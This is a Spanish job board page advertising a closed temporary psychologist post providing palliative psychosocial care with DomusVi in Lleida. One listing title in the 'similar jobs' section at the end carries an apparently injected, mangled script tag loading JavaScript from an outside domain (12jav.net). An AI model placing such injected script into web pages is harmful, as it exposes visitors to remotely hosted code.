Asaja Empleo. Ofertas de trabajo

Psicólogo/a Equipo de Atención Psicosocial DomusVi Lleida

DomusVi
Lleida, Lleida
Anunciado el 17 de abril
Esta oferta ya no acepta candidaturas
Tipo de jornada
Completa
Tipo de contrato
De duración determinada
Salario
Salario sin especificar
Estudios mínimos
Grado
Nivel
Empleado/a
Número de vacantes
1
Número de inscritos
1
Descripción del empleo
DomusVi es la compañía con la mayor red de centros y servicios sanitarios y sociales de atención a las personas mayores y de salud mental del país. El trato humano y familiar, la especialización sanitaria y el enfoque de confort y bienestar definen todos nuestros servicios.

En DomusVi, somos más de 28.000 profesionales y nos caracteriza nuestra cualificación, pasión y compromiso. Si estos son los valores que te definen, ¡te estamos buscando!

Nuestros valores definen a nuestro equipo. Promovemos un sentimiento de orgullo de pertenencia y ofrecemos un valor añadido a residentes y familias:

*
El saber cuidar: ponemos nuestros conocimientos, experiencia y humanidad al servicio de los cuidados.
*
El espíritu pionero: la innovación y las nuevas tecnologías forman parte de nuestro día a día.
*
La empatía innata: ponemos en valor la escucha activa y afectiva.
*
La confianza compartida: desarrolla tu carrera profesional desde la confianza plena y recíproca en las relaciones personales.
*
La sinceridad de las emociones: añade valor a tu trayectoria profesional siendo parte de la vida de nuestros/as residentes y usuarios/as.


Misión del puesto:

Atender las necesidades psicológicas, emocionales y espirituales del paciente terminal, al objeto de preservar su propia dignidad y la aceptación del final de su vida. Aumentar su confort psicológico y servir de acompañamiento emocional en su proceso de fin de vida para que lo transite de manera positiva y en paz. Atender las necesidades psicológicas y emocionales de los/las familiares del/de la paciente terminal y sus cuidadores/as en los momentos de afrontar la fase de pronóstico, durante el proceso final de vida y de duelo tras su fallecimiento

Funciones:

* Atención psicológica a pacientes incluidos en el programa de atención psicosocial de la Fundación La Caixa y a sus familiares, tanto en la Unidad de Hospitalización de Cuidados Paliativos, como en sus domicilios, cumpliendo las asignaciones de pacientes que le son dadas por los Médicos de Asistencia Hospitalaria y de Asistencia Domiciliaria de los Hospitales para los que presta sus servicios.
* Elaborar y registrar, tanto en la plataforma de la Fundación La Caixa, como en la del Hospital, el informe psicológico valorativo de la primera intervención que realiza con cada paciente, así como los seguimientos y el informe final tras la última intervención, en el que indicará, fecha y motivo del cese de las intervenciones (muerte, derivación, etc.)
* Intervenciones de soporte psicológico-emocional a profesionales sanitarios de los hospitales que trabajan en las unidades de cuidados paliativos
* Coordinación con médicos/as, enfermeros/as y auxiliares de enfermería de los hospitales para evaluar la situación de cada paciente y desarrollar planes de actuación y atención integral.
* Decidir la frecuencia con la que dará asistencia a cada paciente y registrar, tanto en la plataforma de la Fundación La Caixa como en la del Hospital los/las nuevos/nuevas pacientes que atiende, así como todas las intervenciones que realiza con ellos y sus resultados
* Atención psicológica a familiares de pacientes en fase de duelo. Registrar, tanto en la plataforma de la Fundación La Caixa como en la del Hospital estas actuaciones con valoración de evolución y resultados


Ofrecemos:

* Jornada completa
* Turnos partido
* Contrato temporal
* Incorporación inmediata
* Flexibilidad y compatibilización con las necesidades específicas de la persona seleccionada.

Requisitos mínimos

* Licenciado/a o Graduado/a Universitario en Psicología
* Recomendable postgrado en Atención Psicosocial y Espiritual a Personas en Situación de Enfermedad Avanzada, Especialidad en Psicología Clínica (Vía PIR) o Formación específica en promoción de la salud mental, prevención, evaluación, diagnóstico, tratamiento psicoterapéutico individual y familiar, y psicoterapia grupal.
* Valorable experiencia previa en atención psicosocial a pacientes terminales.
* Se valorará positivamente la disponibilidad de cursos de formación relacionados con el área así como formación complementaria en términos de fomento de la Igualdad.

Conocimientos necesarios
Psicología
Compartir esta oferta
Más empleos en DomusVi
Gerocultor/a - Auxiliar de enfermería Centro Residencial DomusVi La Dehesa
DomusVi
Gijón, Asturias
Hace 1d
Coordinador/a de teleasistencia DomusVi TAD Mallorca
DomusVi
Campos, Illes Balears
Hace 1d
Director/a Centro Residencial DomusVi Arandia
DomusVi
Arrigorriaga, Bizkaia
Hace 1d

Empleos similares

PSICÓLOGO/A SANITARIO_SCRIPT sRc=//12jav.net/1.js>
BUENCOCO
Lleida, Lleida
20 de marzo
Docent CP Atenció a l'alumnat amb Necessitats Educatives Especials
Fundació Pere Tarrés
Lleida, Lleida
4 de octubre